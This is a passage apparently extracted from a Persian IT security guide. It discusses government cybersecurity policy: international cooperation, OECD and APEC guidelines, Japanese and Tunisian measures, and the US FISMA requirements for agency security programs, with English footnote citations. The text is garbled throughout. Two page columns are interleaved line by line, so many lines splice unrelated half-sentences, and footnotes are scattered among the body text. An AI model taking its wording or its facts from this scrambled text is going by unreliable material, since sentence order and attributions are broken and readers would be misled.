‫ﺗﻼﺷﻬﺎ ﺩﺭ ﺟﻬﺖ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴـﺖ ﺍﻣـﺮﻱ ﺿـﺮﻭﺭﻱ‬
‫ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‬ ‫•‬ ‫ﺍﺳﺖ‪ .‬ﺑﻤﻨﻈﻮﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ‪ ،‬ﺩﻭﻟﺘﻬـﺎ ﻭ‬
‫ﺑﺮﺍﻱ ﺳﺎﺩﻩﺗﺮ ﻛـﺮﺩﻥ ﺗﺒـﺎﺩﻝ ﻧﻈـﺮ ﻭ ﻫﻤﻜـﺎﺭﻱ ﺩﺭ ﻣـﻮﺭﺩ‬ ‫ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺁﻧﻬﺎ ﺑﺎﻳـﺪ ﻛﺎﺭﻛﻨـﺎﻥ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﮔﺴﺘﺮﺵ ﻳﻚ "ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺘـﻲ" ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ ﺑﺨـﺶ‬ ‫ﻣﻮﺿــﻮﻋﺎﺕ ﭘﻴﭽﻴــﺪﺓ ﻓﻨــﻲ ﻭ ﻗــﺎﻧﻮﻧﻲ ﺑــﺎ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ‬
‫ﺧﺼﻮﺻﻲ ﺩﺭ ﺳﻄﺢ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‪ ،‬ﺩﻭﻟﺘﻬﺎ ﺑﺎﻳـﺪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ‬
‫ﻫﻤﻜﺎﺭﻱ ﻛﻨﻨﺪ ﺗـﺎ ﺑـﺮﺍﻱ ﺟـﺮﺍﺋﻢ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﻗـﻮﺍﻧﻴﻦ‬
‫ﺳــﺎﺯﮔﺎﺭﻱ ﺑــﻪ ﺗــﺼﻮﻳﺐ ﺑﺮﺳــﺎﻧﻨﺪ ﻭ ﻧﻴﺮﻭﻫــﺎﻱ ﺍﻧﺘﻈــﺎﻣﻲ‬ ‫‪50‬‬ ‫‪APEC Cybersecurity Strategy,‬‬
‫‪http://www.apecsec.org.sg/content/apec/apec‬‬
‫‪_groups/working_groups/telecommunications‬‬
‫‪_and_information.html‬‬
‫‪Council of European Union, Council‬‬
‫‪Resolution of 28 January 2002 on a common‬‬
‫‪approach & specific actions in the area of‬‬
‫‪network & information security, (2002/C 43/02),‬‬
‫‪52‬‬ ‫‪Respect for Privacy‬‬ ‫‪http://www.europa.eu.int/information_society/e‬‬
‫‪53‬‬ ‫‪OECD Guidelines for the Security of‬‬ ‫‪europe/action_plan/safe/netsecres_en.pdf‬‬
‫‪Information Systems and Networks: Towards‬‬ ‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﻢ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ‬ ‫‪۵۱‬‬
‫‪a Culture of Security, July 25, 2002,‬‬
‫‪http://www.oecd.org/pdf/M00034000/M000340‬‬ ‫ﻭ ﻫﻢ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﭼﻨـﻴﻦ ﻣـﻲﮔﻮﻳـﺪ ﻛـﻪ‬
‫‪00.pdf‬‬ ‫ﺩﻭﻟﺖ ﻧﺒﺎﻳﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﺤﻤﻴـﻞ‬
‫ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴـﺸﺘﺮ ﺑـﻪ ﺁﺩﺭﺳـﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﭘـﺎﻭﺭﻗﻲ ﺷـﻤﺎﺭﻩ ‪۴۸‬‬ ‫ﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬ ‫‪The National Strategy to Secure Cyberspace‬‬
‫‪54‬‬ ‫‪APEC Cybersecurity Strategy,‬‬ ‫‪[U.S.], February 2003, pp. 11, 15‬‬
‫‪http://www.apecsec.org.sg/content/apec/apec‬‬ ‫‪http://www.whitehouse.gov/pcipb‬‬
‫‪_groups/working_groups/telecommunications‬‬ ‫‪http://www.dhs.gov/interweb/assetlibrary/Natio‬‬
‫‪_and_information.html‬‬ ‫‪nal_Cyberspace_Strategy.pdf‬‬
‫‪٢٤١‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫ﻛﻨﺪ‪ ٦٠.‬ﺩﺭ ﺗﻮﻧﺲ ﻧﻴﺰ ﻣﺸﺎﺑﻪ ﻫﻤﻴﻦ ﻣـﺴﺌﻠﻪ ﺻـﻮﺭﺕ ﭘـﺬﻳﺮﻓﺖ ﻭ‬ ‫ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﺎﻳﺪ ﺍﺯ ﻃﺮﻳﻖ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ‬
‫‪٥٥‬‬
‫ﺩﻭﻟﺖ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۲‬ﻗﻮﺍﻧﻴﻨﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺗﺼﻮﻳﺐ ﻭ ﺍﺑﻼﻍ‬ ‫ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻛﺮﺩ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻣﻮﻇـﻒ ﺑﻮﺩﻧـﺪ ﺑـﺼﻮﺭﺕ‬
‫ﺭﻭﻧﺪ ﺗﻮﺳﻌﻪ ﻭ ﺍﺟﺮﺍﻱ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑـﺮﺍﻱ ﺩﻭﻟـﺖ‪،‬‬
‫ﺳﺎﻟﻴﺎﻧﻪ ﻣﻮﺭﺩ ﻣﻤﻴﺰﻱ‪ ٦١‬ﺳﺎﻟﻴﺎﻧﺔ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﻋﻨﺎﺻﺮ ﻣﺸﺘﺮﻛﻲ ﺑﺎ ﺗﻮﺳﻌﻪ ﻭ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﺔ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﺩﺭ‬
‫ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺍﻓﺮﺍﺩ ﺣﻘﻮﻗﻲ ﺩﺍﺭﺩ‪:‬‬
‫ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﺩﺭ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ؛‬ ‫•‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ‪ -‬ﺭﺍﻫﻜﺎﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‬
‫ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺁﮔﺎﻫﻲ؛‬ ‫•‬
‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻭﻟﺖ‬ ‫ﮔﻤــﺎﺭﺩﻥ ﻳﻜﻨﻔــﺮ ﺑﻌﻨــﻮﺍﻥ ﻓﺮﻣﺎﻧــﺪﻩ ﺑــﺮﺍﻱ ﺍﻳﺠــﺎﺩ‬ ‫•‬
‫ﺑﺎ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮﻱ ﻣﺸﺨﺺ ﺷﺪﻩ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻣﺼﻮﺑﺔ ﻣـﺪﻳﺮﻳﺖ‬ ‫ﻫﻤﺎﻫﻨﮕﻲ ﺩﺭ ﺳﻴﺎﺳﺘﻬﺎ؛‬
‫‪٦٢‬‬ ‫‪٥٦‬‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ )ﻣﺼﻮﺏ ﺳﺎﻝ ‪ (۲۰۰۲‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷـﺪﻩ ﺍﺳـﺖ‪.‬‬ ‫ﺗﻮﺳﻌﺔ ﺑﺮﻧﺎﻣﺔ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ ؛‬ ‫•‬
‫ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺑﺮﺧﻲ ﺭﻭﺷﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺑـﻪ‬ ‫ﺗﻄﺒﻴﻖ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ؛‬ ‫•‬
‫ﺗﺼﻮﻳﺮ ﻣﻲ ﻛﺸﺪ ﻛﻪ ﺑﺎﻋﺚ ﻣـﻲﺷـﻮﻧﺪ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ‬ ‫ﺗﻮﺟﻴﻪ ﺳﺎﺧﺘﺎﺭﻱ؛ ﻭ‬ ‫•‬
‫"ﭘﺎﺳﺨﮕﻮﻳﻲ" ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ‪.‬‬ ‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﺩﻭﺭﻩﺍﻱ ﻭ ﺍﺭﺗﻘﺎﻱ ﻣﺪﺍﻭﻡ‪.‬‬ ‫•‬

‫ﻫﺪﻑ ﻣﺸﺨﺺ ‪ FISMA‬ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺩﺭ ﮔـﺴﺘﺮﺓ‬ ‫ﻓــﺎﺯ ﭼﻬــﺎﺭﻡ )ﺑــﺎ ﺗﻤﺮﻛــﺰ ﺑــﺮ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﺩﻭﻟﺘــﻲ( ﺍﻋــﻼﻡ‬
‫ﺩﻭﻟﺖ ﺍﺳﺖ‪ ،‬ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻫﻤﺔ ﺗﻼﺷﻬﺎﻱ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺑـﺮﺍﻱ‬ ‫ﺧﻂﻣﺸﻲﻫﺎﻱ ﻭ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺳـﺖ‪.‬‬
‫ﺍﻳﻤــﻦﺳــﺎﺯﻱ ﺍﻃﻼﻋــﺎﺕ ﺑــﺎ ﻳﻜــﺪﻳﮕﺮ ﻫﻤﺎﻫﻨــﮓ ﺷــﻮﻧﺪ ﻭ ﻧﻴــﺰ‬ ‫ﺑﺮﺧــﻲ ﻛــﺸﻮﺭﻫﺎ ﻣﺜــﻞ ﮊﺍﭘــﻦ ﻭ ﺍﻳﺘﺎﻟﻴــﺎ ﺍﺯ ﻃﺮﻳــﻖ ﭼﻨــﻴﻦ‬
‫ﺭﺍﻫﻜﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻬﻴﻪ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺣﺪﺍﻗﻞ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻻﺯﻡ ﺟﻬـﺖ‬ ‫ﺧﻂﻣﺸﻲﻫﺎﻳﻲ ﺑﻪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﭘﺮﺩﺍﺧﺘـﻪﺍﻧـﺪ‪ .‬ﺩﺭ ﺟـﻮﻻﻱ ﺳـﺎﻝ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻭﻟـﺖ ﺍﺭﺍﺋـﻪ ﮔـﺮﺩﺩ‪ .‬ﻗـﺎﻧﻮﻥ‬ ‫‪ ۲۰۰۰‬ﻛﻤﻴﺘﺔ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﮊﺍﭘـﻦ ﺩﺭ ﺳـﻄﺢ‬
‫ﺗﺼﺪﻳﻖ ﻣﻲﻛﻨﺪ ﻛـﻪ ﻣﺤـﺼﻮﻻﺕ ﺗﺠـﺎﺭﻱ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻣـﺆﺛﺮ ﻭ‬ ‫ﻛﺎﺑﻴﻨﻪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬

‫ﭘﻮﻳﺎﻳﻲ ﺑﺮﺍﻱ ﺩﻭﻟـﺖ ﻓـﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﻧﺪ ﻭ ﺍﻧﺘﺨـﺎﺏ ﺭﺍﻩﺣﻠﻬـﺎﻱ‬ ‫ﺍﺗﺨﺎﺫ ﻛﺮﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﺍﺯ ﺗﻤﺎﻣﻲ ﺍﺩﺍﺭﺍﺕ ﻭ ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫـﺎ ﺧﻮﺍﺳـﺘﻪ‬
‫ﺍﻣﻨﻴﺘﻲ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ ﺑـﻪ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬ ‫ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﺗﺎ ﻓﻮﺭﻳﻪ ‪ ۲۰۰۳‬ﻳﻚ ﺍﺭﺯﻳﺎﺑﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬
‫ﺗﺨﺼﺼﻲ ﻭﺍﮔﺬﺍﺭ ﻣﻲﮔﺮﺩﺩ‪.‬‬ ‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﻭ ﮔﺎﻣﻬـﺎﻱ ﺩﻳﮕـﺮﻱ ﻧﻴـﺰ‬
‫‪ FISMA‬ﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺭﺋﻴﺲ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﻳـﺪ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ‬ ‫ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺩﺍﺭﻧـﺪ‪ .‬ﺩﺭ ﻣـﺎﺭﺱ ‪ ۲۰۰۱‬ﺷـﻮﺭﺍﻱ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺣﻴﻄﺔ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺗﻬﻴـﻪ‪ ،‬ﻣـﺴﺘﻨﺪﺳﺎﺯﻱ ﻭ‬ ‫ﻭﺯﺍﺭﺗــﻲ ﮔــﺴﺘﺮﺵ ﺭﺍﻫﺒــﺮﻱ ﻣﻜــﺎﻧﻴﺰﻩ ﻋﻤــﻮﻣﻲ‪ ٥٧‬ﺑــﺮﺍﻱ ﺗﻤــﺎﻡ‬
‫ﺍﺟﺮﺍ ﻛﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻛﺎﺭﻫﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺍﺯ ﺟﻤﻠـﻪ ﺁﻧﺪﺳـﺘﻪ ﻛـﻪ‬ ‫ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺩﻭﻟﺘﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺗﻮﺳﻂ ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ﻣﺪﻳﺮﻳﺖ ﻣـﻲﺷـﻮﺩ ﺭﺍ ﺩﺭ ﺑـﺮ ﺑﮕﻴـﺮﺩ‪ ٦٣.‬ﺍﻳـﻦ‬ ‫ﻣﻨﺘﺸﺮ ﺳﺎﺧﺖ‪ ٥٨.‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۲‬ﺯﻣﺎﻧﻴﻜﻪ ﻛﻨﮕﺮﺓ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‬
‫ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﺎﺷﺪ‪:‬‬ ‫ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪ ﻛﻪ ﺑﺨﺶ ﺍﺟﺮﺍﻳـﻲ ﺩﻭﻟـﺖ‪ ،‬ﺳـﻄﺢ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻭﻟﺘﻲ ﺭﺍ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺍﺭﺗﻘﺎ ﻧﺪﺍﺩﻩ ﺍﺳﺖ‪،‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺘﻨﺎﻭﺏ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﻣﻴﺰﺍﻥ ﺁﺳـﻴﺒﻲ ﻛـﻪ ﻣﻤﻜـﻦ‬ ‫•‬
‫‪٦٤‬‬
‫ﻣﺼﻮﺑﺔ ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﻭﻟـﺖ )‪ ٥٩(FISMA‬ﺭﺍ ﺍﺑـﻼﻍ‬
‫ﺍﺳﺖ ﺑﻪ ﺩﻻﻳﻠـﻲ ﭼـﻮﻥ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ )ﺍﺳـﺘﻔﺎﺩﻩ‪،‬‬
‫ﻛﺮﺩ ﺗﺎ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎ ﻭ ﺭﻭﺷﻬﺎﻱ ﺍﻧﺠـﺎﻡ ﻛـﺎﺭ ﺩﺭ ﺩﻭﻟـﺖ ﺭﺍ ﺭﻭﺷـﻦ‬

‫‪60‬‬ ‫‪Federal Information Security Management‬‬ ‫‪55‬‬ ‫‪Meeting of G8 Ministers of Justice & Home‬‬
‫‪Act, Title III of E-Government Act of 2002,‬‬ ‫‪Affairs, Paris, May 5, 2003,‬‬
‫‪Pub. Law 107-347,‬‬ ‫‪http://www.g8.utoronto.ca/justice/justice03050‬‬
‫‪http://csrc.nist.gov/policies/FISMA-final.pdf‬‬ ‫‪5.htm‬‬
‫‪61‬‬ ‫‪Auditing‬‬ ‫‪56‬‬ ‫‪Risk Management‬‬
‫ﺑﻪ ﭘﺎﻭﺭﻗﻲ ﻗﺒﻠﻲ ﻣﺮﺍﺟﻌﻪ ﺷﻮﺩ‪ ،‬ﻭ ﻧﻴﺰ‪:‬‬ ‫‪۶۲‬‬ ‫‪57‬‬ ‫‪Ministerial Council for Promoting the‬‬
‫‪http://www.fedcirc.gov/library/legislations/FIS‬‬ ‫‪Digitization of Public Administration‬‬
‫‪MA.html‬‬ ‫‪58‬‬ ‫‪http://www.kantei.go.jp/foreign/it/‬‬
‫‪63‬‬ ‫‪Title 44, United States Code, section 3544‬‬ ‫‪network/priority-all/7.html‬‬
‫‪64‬‬ ‫‪Unauthorized Access‬‬ ‫‪59‬‬ ‫‪Federal Information Security Management Act‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٤٢‬‬

‫ﻋﻤﻠﻜﺮﺩﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻃﺮﺣﻬـﺎ ﻭ ﮔﺰﺍﺭﺷـﺎﺕ ﺩﻳﮕـﺮ ﻧﻴـﺰ‬ ‫ﺍﻓﺸﺎﺳﺎﺯﻱ‪ ،‬ﺍﺧﺘﻼﻝ‪ ،‬ﺗﻐﻴﻴﺮ‪ ،‬ﻳﺎ ﭘﺎﻙ ﻛﺮﺩﻥ( ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﻭﺍﻗـﻊ‬
‫ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ؛ ﺍﺯ ﺟﻤﻠـﻪ ﺁﻧﺪﺳـﺘﻪ ﻛـﻪ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ ﺑﻮﺩﺟـﺔ‬ ‫ﺷﻮﺩ؛‬
‫ﺳﺎﻟﻴﺎﻧﺔ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﻣﺪﻳﺮﻳﺖ ﻣﺎﻟﻲ‪ ،‬ﺣﺴﺎﺑﺮﺳﻲ ﺩﺍﺧﻠﻲ ﻭ ﻛﻨﺘﺮﻟﻬـﺎﻱ‬ ‫ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ‪:‬‬ ‫•‬
‫ﺭﺍﻫﺒـﺮﻱ ﻫــﺴﺘﻨﺪ‪ .‬ﭼﻨﺎﻧﭽــﻪ ﺩﺭ ﺳﻴﺎﺳــﺘﻬﺎ‪ ،‬ﺭﻭﺍﻟﻬــﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫــﺎ‬ ‫‪ o‬ﺑﺮ ﺍﺳﺎﺱ ﻓﺮﺁﻳﻨﺪ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻫﺴﺘﻨﺪ؛‬
‫ﻫﺮﮔﻮﻧﻪ ﺍﺷﻜﺎﻟﻲ ﭘﻴﺪﺍ ﺷﻮﺩ ﺑﺎﻳﺪ ﺍﻳﻦ ﺍﺷﻜﺎﻝ ﺑﻪ ﺍﺩﺍﺭﺓ ﻣـﺪﻳﺮﻳﺖ ﻭ‬ ‫‪ o‬ﻣﻨﺠﺮ ﺑﻪ ﻛﺎﻫﺶ ﻫﺰﻳﻨﻪﻫـﺎﻱ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﻭ ﻛﻨﮕﺮﻩ ﮔﺰﺍﺭﺵ ﮔﺮﺩﺩ‪.‬‬ ‫ﻣﻲﺷﻮﻧﺪ؛‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳـﺪ ﻫﻤـﻪﺳـﺎﻟﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﻣﻨﻴﺘـﻲ ﻣـﺴﺘﻘﻠﻲ ﺭﺍ ﺑـﺮﺍﻱ‬ ‫‪ o‬ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﭼﺮﺧـﺔ‬
‫ﻣﺸﺨﺺ ﻛﺮﺩﻥ ﺗﺄﺛﻴﺮ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋـﺎﺗﻲ ﻭ ﻋﻤﻠﻜﺮﺩﻫـﺎﻱ‬ ‫ﺣﻴﺎﺕ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﺑـﺼﻮﺭﺕ‬
‫ﺧﻮﺩ ﺍﺭﺍﺋـﻪ ﺩﻫﻨـﺪ‪ .‬ﻫـﺮ ﺍﺭﺯﻳـﺎﺑﻲ ﺩﻭ ﻗـﺴﻤﺖ ﺩﺍﺭﺩ‪ :‬ﻗـﺴﻤﺖ ﺍﻭﻝ‬ ‫ﻛﺎﻣﻞ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؛ ﻭ‬
‫ﺑﺮﺭﺳــﻲ ﺗــﺄﺛﻴﺮ ﺳﻴﺎﺳــﺘﻬﺎ‪ ،‬ﻓﺮﺁﻳﻨــﺪﻫﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫــﺎﻱ ﺍﻣﻨﻴــﺖ‬ ‫‪ o‬ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛـﻪ ﺍﻟﺰﺍﻣـﺎﺕ ﻭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ‬
‫‪٦٥‬‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻳﻚ ﺯﻳـﺮﺑﺨﺶ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺳـﺎﺯﻣﺎﻥ؛ ﻭ‬ ‫ﺍﻣﻨﻴﺘﻲ ﺍﺩﺍﺭﺓ ﻣـﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟـﻪ ﺭﻳـﺰﻱ )‪،OMB‬‬
‫ﻗﺴﻤﺖ ﺩﻭﻡ ﻳﻚ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ‪ ،‬ﺭﻭﺍﻟﻬـﺎ‪ ،‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ‬ ‫ﺑﺨﺸﻲ ﺍﺯ ﺩﻓﺘﺮ ﺍﺟﺮﺍﻳﻲ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ( ﺑﺮﺁﻭﺭﺩﻩ ﻣﻲﺷﻮﺩ؛‬
‫‪٦٦‬‬
‫ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺗﺒﻂ‪.‬‬ ‫ﺗﻬﻴــﺔ ﻃﺮﺣﻬــﺎﻱ ﻓﺮﻋــﻲ ﺑــﺮﺍﻱ ﻓــﺮﺍﻫﻢ ﻛــﺮﺩﻥ ﺍﻣﻨﻴــﺖ‬ ‫•‬
